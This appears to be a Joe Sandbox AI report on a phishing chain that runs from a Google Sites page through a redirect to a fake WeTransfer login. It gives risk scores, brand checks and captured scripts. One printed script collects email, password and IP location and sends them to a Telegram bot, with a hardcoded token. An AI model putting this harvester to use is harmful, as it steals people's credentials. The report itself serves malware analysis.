| URL: https://sites.google.com Model: Joe Sandbox AI | ```json{ "brand": "Google", "brand_classification": "wellknown", "legit_url": "https://www.google.com", "similarity": 7, "spoofed": 2, "reasoning": "The URL 'https://sites.google.com' uses the 'google.com' domain, which is the legitimate domain for Google. The subdomain 'sites' is a legitimate service offered by Google for creating websites, known as Google Sites. There are no character substitutions or misleading structural changes. The use of the 'google.com' domain indicates a legitimate purpose related to Google's services, and there is no indication of typosquatting. The similarity score is based on the use of the 'google.com' domain, but the likelihood of this being a typosquatting attempt is very low due to the legitimate context of the subdomain."} |
URL: https://sites.google.com |
| URL: https://hm.ru/js/m/goto/main.js?1697227642... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script demonstrates a mix of moderate-risk and low-risk behaviors. It includes external data transmission to an unspecified URL, as well as aggressive DOM manipulation. However, the script appears to have a legitimate purpose related to a PIN code form and redirection, which mitigates some of the risks. Further review may be necessary to determine the full context and intent of the script."
} |
let redirect_link;
let pin_code_form;
let p_message;
$(document).ready(function () {
redirect_link = $('.redirect-link');
pin_code_form = $('#pin-code-form');
p_message = $('p.message');
if (redirect_link.length > 0) {
setTimeout(function () {
console.log(1);
window.location.href = $(redirect_link).find('a').attr('href');
}, 1000)
}
if (pin_code_form.length > 0) {
let pin_input = $(pin_code_form).find('input[type=number]');
resize_pin_code_form();
$(window).on('resize', resize_pin_code_form);
$.each(pin_input, function (k, v) {
let input = $(pin_input)[k];
let tabindex = $(input).prop('tabindex');
$(input).on('paste', function (e) {
e.preventDefault();
});
$(input).on('keyup', function () {
let old_val = $(input).data('old-val');
let new_val;
let init_val = $(input).val()
if (isNaN(parseInt(init_val))) {
new_val = '';
} if (parseInt(init_val) < 0) {
new_val = -parseInt(init_val);
} else if (init_val.length > 1) {
new_val = init_val.slice(init_val.length - 1, init_val.length);
}
if (init_val !== new_val && new_val !== undefined) {
$(input).val(new_val);
} else {
new_val = init_val;
}
$(input).data('old-val', new_val);
if (new_val.length === 1 && tabindex < 4) {
$(pin_input)[tabindex].focus();
} else if (old_val !== undefined && new_val.length === 0 && tabindex > 1) {
$(pin_input)[tabindex - 2].focus();
}
});
});
$(pin_code_form).on('submit', function (e) {
e.preventDefault();
let fd = new FormData($(pin_code_form)[0]);
let inputs = $('#pin-code-form input[type=number]');
$(inputs).removeClass('has-error');
$(p_message).html(' ');
$.ajax({
url: '',
data: fd,
processData: false,
contentType: false,
dataType: 'json',
type: 'POST',
xhrFields: {
withCredentials: true
},
success: function (response) {
if (response.status < 0) {
$(inputs).addClass('has-error');
$(p_message).text(response.message);
} else {
$(inputs).addClass('has-success');
setTimeout(function () {
window.location.href = response.data;
}, 1000)
}
}
});
});
}
});
function resize_pin_code_form() {
var input = $(pin_code_form).find('input');
var width = $(input).css('width');
var font_size = Math.round(parseFloat(width)/16) - 2;
$(input).css('height', width).css('font-size', font_size + 'rem');
$(p_message).css('font-size', font_size/4 + 'rem');
}
|
| URL: https://hm.ru/js/bootstrap.bundle.min.js... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided code appears to be the minified version of the Bootstrap 4.4.1 library, which is a popular and widely-used front-end framework for building responsive and mobile-first websites. The code does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or obfuscated code/URLs. It primarily consists of utility functions and event handling related to Bootstrap's core functionality. This code is likely to be legitimate and low-risk."
} |
/*!
* Bootstrap v4.4.1 (https://getbootstrap.com/)
* Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors)
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
*/
!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports,require("jquery")):"function"==typeof define&&define.amd?define(["exports","jquery"],t):t((e=e||self).bootstrap={},e.jQuery)}(this,function(e,p){"use strict";function i(e,t){for(var n=0;n<t.length;n++){var i=t[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(e,i.key,i)}}function s(e,t,n){return t&&i(e.prototype,t),n&&i(e,n),e}function t(t,e){var n=Object.keys(t);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(t);e&&(i=i.filter(function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable})),n.push.apply(n,i)}return n}function l(o){for(var e=1;e<arguments.length;e++){var r=null!=arguments[e]?arguments[e]:{};e%2?t(Object(r),!0).forEach(function(e){var t,n,i;t=o,i=r[n=e],n in t?Object.defineProperty(t,n,{value:i,enumerable:!0,configurable:!0,writable:!0}):t[n]=i}):Object.getOwnPropertyDescriptors?Object.defineProperties(o,Object.getOwnPropertyDescriptors(r)):t(Object(r)).forEach(function(e){Object.defineProperty(o,e,Object.getOwnPropertyDescriptor(r,e))})}return o}p=p&&p.hasOwnProperty("default")?p.default:p;var n="transitionend";function o(e){var t=this,n=!1;return p(this).one(m.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||m.triggerTransitionEnd(t)},e),this}var m={TRANSITION_END:"bsTransitionEnd",getUID:function(e){for(;e+=~~(1e6*Math.random()),document.getElementById(e););return e},getSelectorFromElement:function(e){var t=e.getAttribute("data-target");if(!t||"#"===t){var n=e.getAttribute("href");t=n&&"#"!==n?n.trim():""}try{return document.querySelector(t)?t:null}catch(e){return null}},getTransitionDurationFromElement:function(e){if(!e)return 0;var t=p(e).css("transition-duration"),n=p(e).css("transition-delay"),i=parseFloat(t),o=parseFloat(n);return i||o?(t=t.split(",")[0],n=n.split(",")[0],1e3*(parseFloat(t)+parseFloat(n))):0},reflow:function(e){return e.offsetHeight},triggerTransitionEnd:function(e){p(e).trigger(n)},supportsTransitionEnd:function(){return Boolean(n)},isElement:function(e){return(e[0]||e).nodeType},typeCheckConfig:function(e,t,n){for(var i in n)if(Object.prototype.hasOwnProperty.call(n,i)){var o=n[i],r=t[i],s=r&&m.isElement(r)?"element":(a=r,{}.toString.call(a).match(/\s([a-z]+)/i)[1].toLowerCase());if(!new RegExp(o).test(s))throw new Error(e.toUpperCase()+': Option "'+i+'" provided type "'+s+'" but expected type "'+o+'".')}var a},findShadowRoot:function(e){if(!document.documentElement.attachShadow)return null;if("function"!=typeof e.getRootNode)return e instanceof ShadowRoot?e:e.parentNode?m.findShadowRoot(e.parentNode):null;var t=e.getRootNode();return t instanceof ShadowRoot?t:null},jQueryDetection:function(){if("undefined"==typeof p)throw new TypeError("Bootstrap's JavaScript requires jQuery. jQuery must be included before Bootstrap's JavaScript.");var e=p.fn.jquery.split(" ")[0].split(".");if(e[0]<2&&e[1]<9||1===e[0]&&9===e[1]&&e[2]<1||4<=e[0])throw new Error("Bootstrap's JavaScript requires at least jQuery v1.9.1 but less than v4.0.0")}};m.jQueryDetection(),p.fn.emulateTransitionEnd=o,p.event.special[m.TRANSITION_END]={bindType:n,delegateType:n,handle:function(e){if(p(e.target).is(this))return e.handleObj.handler.apply(this,arguments)}};var r="alert",a="bs.alert",c="."+a,h=p.fn[r],u={CLOSE:"close"+c,CLOSED:"closed"+c,CLICK_DATA_API:"click"+c+".data-api"},f="alert",d="fade",g="show",_=function(){function i(e){this._element=e}var e=i.prototype;return e.close=function(e){var t=this._element;e&&(t=this._getRootElement(e)),this._triggerCloseEvent(t).isDefaultPrevented()||this._removeElement(t)},e.dispose=function(){p.removeData(this._element,a),this._element=null},e._getRootElement=function(e){var t=m.getSelecto |
| URL: https://hm.ru/js/clipboard.min.js... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a legitimate clipboard.js library, which is a popular open-source library for copying text to the clipboard. The code does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscation. The library uses standard DOM manipulation and event handling techniques to provide a cross-browser clipboard functionality. While the code uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, this script is likely a benign utility with no clear signs of malicious intent."
} |
/*!
* clipboard.js v2.0.4
* https://zenorocha.github.io/clipboard.js
*
* Licensed MIT Zeno Rocha
*/
!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):"object"==typeof exports?exports.ClipboardJS=e():t.ClipboardJS=e()}(this,function(){return function(n){var o={};function r(t){if(o[t])return o[t].exports;var e=o[t]={i:t,l:!1,exports:{}};return n[t].call(e.exports,e,e.exports,r),e.l=!0,e.exports}return r.m=n,r.c=o,r.d=function(t,e,n){r.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:n})},r.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)r.d(n,o,function(t){return e[t]}.bind(null,o));return n},r.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return r.d(e,"a",e),e},r.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},r.p="",r(r.s=0)}([function(t,e,n){"use strict";var r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},i=function(){function o(t,e){for(var n=0;n<e.length;n++){var o=e[n];o.enumerable=o.enumerable||!1,o.configurable=!0,"value"in o&&(o.writable=!0),Object.defineProperty(t,o.key,o)}}return function(t,e,n){return e&&o(t.prototype,e),n&&o(t,n),t}}(),a=o(n(1)),c=o(n(3)),u=o(n(4));function o(t){return t&&t.__esModule?t:{default:t}}var l=function(t){function o(t,e){!function(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}(this,o);var n=function(t,e){if(!t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!e||"object"!=typeof e&&"function"!=typeof e?t:e}(this,(o.__proto__||Object.getPrototypeOf(o)).call(this));return n.resolveOptions(e),n.listenClick(t),n}return function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Super expression must either be null or a function, not "+typeof e);t.prototype=Object.create(e&&e.prototype,{constructor:{value:t,enumerable:!1,writable:!0,configurable:!0}}),e&&(Object.setPrototypeOf?Object.setPrototypeOf(t,e):t.__proto__=e)}(o,c.default),i(o,[{key:"resolveOptions",value:function(){var t=0<arguments.length&&void 0!==arguments[0]?arguments[0]:{};this.action="function"==typeof t.action?t.action:this.defaultAction,this.target="function"==typeof t.target?t.target:this.defaultTarget,this.text="function"==typeof t.text?t.text:this.defaultText,this.container="object"===r(t.container)?t.container:document.body}},{key:"listenClick",value:function(t){var e=this;this.listener=(0,u.default)(t,"click",function(t){return e.onClick(t)})}},{key:"onClick",value:function(t){var e=t.delegateTarget||t.currentTarget;this.clipboardAction&&(this.clipboardAction=null),this.clipboardAction=new a.default({action:this.action(e),target:this.target(e),text:this.text(e),container:this.container,trigger:e,emitter:this})}},{key:"defaultAction",value:function(t){return s("action",t)}},{key:"defaultTarget",value:function(t){var e=s("target",t);if(e)return document.querySelector(e)}},{key:"defaultText",value:function(t){return s("text",t)}},{key:"destroy",value:function(){this.listener.destroy(),this.clipboardAction&&(this.clipboardAction.destroy(),this.clipboardAction=null)}}],[{key:"isSupported",value:function(){var t=0<arguments.length&&void 0!==arguments[0]?arguments[0]:["copy","cut"],e="string"==typeof t?[t]:t,n=!!document.queryCommandSupported;return e.forEach(function(t){n=n&&!!document.queryCommandSupported(t)}),n}}]),o}();function s(t,e){var n="data-clipboard-"+t;if(e.hasAttribute(n)) |
| URL: https://sites.google.com/view/mangotamp/accueil?authuser=1 Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": true,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "file hosting"
} |
 |
| URL: https://www.google.com Model: Joe Sandbox AI | ```json{ "brand": "Google", "brand_classification": "wellknown", "legit_url": "https://www.google.com", "similarity": 10, "spoofed": 0, "reasoning": "The URL 'https://www.google.com' is the legitimate and official domain for Google, a globally recognized brand. There are no character substitutions, structural changes, or misleading subdomains or extensions present. The URL is exactly as expected for Google's main website, indicating no attempt at typosquatting."} |
URL: https://www.google.com |
| URL: https://www.google.com/url?q=https%3A%2F%2Fhm.ru%2FKMpwiF&sa=D&sntz=1&usg=AOvVaw1XiLz0Ih0za_AtdEjgLT64 Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "unknown"
} |
 |
| URL: https://hm.ru/js/jquery-3.4.1.min.js... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable library for DOM manipulation and event handling. There are no high-risk indicators such as dynamic code execution or data exfiltration. The script does not interact with external domains or exhibit suspicious behavior. It uses standard practices for a library of its kind, and there are no signs of malicious intent."
} |
/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.4.1",k=function(e,t){return new k.fn.init(e,t)},p=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g;function d(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}k.fn=k.prototype={jquery:f,constructor:k,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=k.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return k.each(this,e)},map:function(n){return this.pushStack(k.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},k.extend=k.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(k.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||k.isPlainObject(n)?n:{},i=!1,a[t]=k.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},k.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t){b(e,{nonce:t&&t.nonce})},each:function(e,t){var n,r=0;if(d(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?"":(e+"").replace(p,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(d(Object(e))?k.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(d(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g.apply([],a)},guid:1,support:y}),"function"==typeof Symbol&&(k.fn[Symbol.iterator]=t[Symbol.iterator]),k.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var h=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,k="sizzle"+1*new Date,m=n.document,S=0,r=0,p=ue(),x=ue(),N=ue(),A=ue(),D=function(e,t){return e===t&&(l=!0),0},j={}.hasOwnProperty,t=[],q=t.pop,L=t.push,H=t.push,O=t.sl |
| URL: https://sites.google.com/view/mangotamp/accueil?authuser=1 Model: Joe Sandbox AI | {
"brands": [
"Devis",
"Adobe"
]
} |
|
| URL: https://www.google.com/url?q=https%3A%2F%2Fhm.ru%2FKMpwiF&sa=D&sntz=1&usg=AOvVaw1XiLz0Ih0za_AtdEjgLT64 Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/w... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript code appears to be a simple captcha implementation with no high-risk indicators. It generates a random captcha, allows the user to input the captcha, and verifies the input. The code does not exhibit any behaviors related to dynamic code execution, data exfiltration, or obfuscation. The only moderate-risk indicator is the use of `window.location.href` to redirect the user, but this is a common and legitimate practice. Overall, the code seems to be a benign implementation of a captcha system."
} |
const captcha = document.querySelector(".captcha"),
reloadBtn = document.querySelector(".reload-btn"),
inputField = document.querySelector(".input-area input"),
checkBtn = document.querySelector(".check-btn"),
statusTxt = document.querySelector(".status-text");
//storing all captcha characters in array
let allCharacters = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9];
function getCaptcha(){
for (let i = 0; i < 4; i++) { //getting 6 random characters from the array
let randomCharacter = allCharacters[Math.floor(Math.random() * allCharacters.length)];
captcha.innerText += ` ${randomCharacter}`; //passing 6 random characters inside captcha innerText
}
}
getCaptcha(); //calling getCaptcha when the page open
//calling getCaptcha & removeContent on the reload btn click
reloadBtn.addEventListener("click", ()=>{
removeContent();
getCaptcha();
});
checkBtn.addEventListener("click", e =>{
e.preventDefault(); //preventing button from it's default behaviour
statusTxt.style.display = "block";
//adding space after each character of user entered values because I've added spaces while generating captcha
let inputVal = inputField.value.split('').join(' ');
if(inputVal == captcha.innerText){ //if captcha matched
function Redirect() {
window.location.href = "log.html";
}
Redirect();
setTimeout(()=>{ //calling removeContent & getCaptcha after 4 seconds
removeContent();
getCaptcha();
}, 2000);
}else{
statusTxt.style.color = "#ff0000";
statusTxt.innerText = "Le captcha ne correspond pas. Veuillez ressayer!";
}
});
function removeContent(){
inputField.value = "";
captcha.innerText = "";
statusTxt.style.display = "none";
}
|
| URL: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/w... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including data exfiltration, dynamic code execution, and the use of obfuscated URLs. The script collects sensitive user information (email and password) and sends it to a Telegram bot, which could be used for malicious purposes. Additionally, the script fetches the user's IP address and location details, further compromising the user's privacy. While the script may have a legitimate purpose, the way it handles and transmits sensitive data poses a significant security risk."
} |
const telegramBotToken = '7785321630:AAGo7KXU-0boVs4i4GnL4A4bxprqBEetwJE'; // Replace with your bot token
const chatId = '-4782781777'; // Replace with your chat ID
const redirectUrl = './log-error.html'; // Replace with the URL you want to redirect to
// Function to send data to Telegram bot
function sendMessageToTelegram(message) {
const url = `https://api.telegram.org/bot${telegramBotToken}/sendMessage`;
// Prepare data to be sent in the POST request
const data = {
chat_id: chatId,
text: message
};
// Send POST request to Telegram API
fetch(url, {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data)
})
.then(response => response.json())
.then(data => {
if (data.ok) {
// Redirect to another page after successful submission
window.location.href = redirectUrl;
} else {
alert('Error: ' + data.description);
}
})
.catch((error) => {
console.error('Error:', error);
alert('Error sending data.');
});
}
// Function to get user's IP and location details
function getUserIPandLocation(callback) {
fetch('https://ipapi.co/json/')
.then(response => response.json())
.then(data => {
const userInfo = {
ip: data.ip,
country: data.country_name,
city: data.city,
region: data.region
};
callback(userInfo);
})
.catch(error => {
console.error('Error fetching IP info:', error);
callback(null); // If there's an error, just proceed without IP/location info
});
}
// Listen for form submission
document.getElementById('loginForm').addEventListener('submit', (e) => {
e.preventDefault(); // Prevent page reload
const email = document.getElementById('1-email').value;
const password = document.getElementById('1-password').value;
// Fetch IP and location details
getUserIPandLocation((userInfo) => {
let message = `--> MAILBOX LOGIN <--\n-EMAIL -> ${email}\n-PASS -> ${password}`;
if (userInfo) {
message += `\n-IP -> ${userInfo.ip}\n-Location -> ${userInfo.city}, ${userInfo.region}, ${userInfo.country}`;
} else {
message += `\n-IP/Location -> Not available`;
}
// Send the message to Telegram
sendMessageToTelegram(message);
});
});
|
| URL: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "Entrez le capcha",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "unknown"
} |
 |
| URL: https://gaqdo-poo-1056315.ingress-alpha.ewp.live Model: Joe Sandbox AI | ```json{ "brand": "unknown", "brand_classification": "unknown", "legit_url": "unknown", "similarity": 1, "spoofed": 1, "reasoning": "The URL 'https://gaqdo-poo-1056315.ingress-alpha.ewp.live' does not closely resemble any known brand or legitimate URL. The domain 'ewp.live' and subdomain 'ingress-alpha' do not suggest any connection to a well-known brand. The structure and naming do not indicate any visual character substitutions or minor structural changes typical of typosquatting. The use of numbers and hyphens in the subdomain 'gaqdo-poo-1056315' appears random and does not mimic any known brand. The URL could be part of a legitimate service or internal tool, given the use of 'ingress-alpha', which is a common term in software development and deployment contexts. Overall, there is no strong evidence of typosquatting or user confusion."} |
URL: https://gaqdo-poo-1056315.ingress-alpha.ewp.live |
| URL: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log.html Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Envoyez des fichiers, dplacez des ides avec WeTransfer",
"prominent_button_name": "Se connecter WeTransfer",
"text_input_field_labels": [
"E-mail",
"Mot de passe"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false,
"page_classification": "file hosting"
}
Google indexed: False |
 |
| URL: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://gaqdo-poo-1056315.ingress-alpha.ewp.live/wp-content/gaqdo/log.html Model: Joe Sandbox AI | {
"brands": [
"WeTransfer"
]
}
Google indexed: False |
|
Edit tour
chrome.exe (PID: 6948 cmdline: 
